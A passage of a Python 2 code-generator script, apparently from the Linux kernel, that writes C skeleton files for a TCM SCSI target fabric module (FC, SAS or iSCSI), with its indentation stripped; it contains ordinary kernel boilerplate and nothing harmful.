buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!(se_nacl_new))\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!(tpg)) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!(" + fabric_mod_port + ")) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (!(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return -ENOMEM;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "#ifdef MODULE\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
buf += "#endif\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
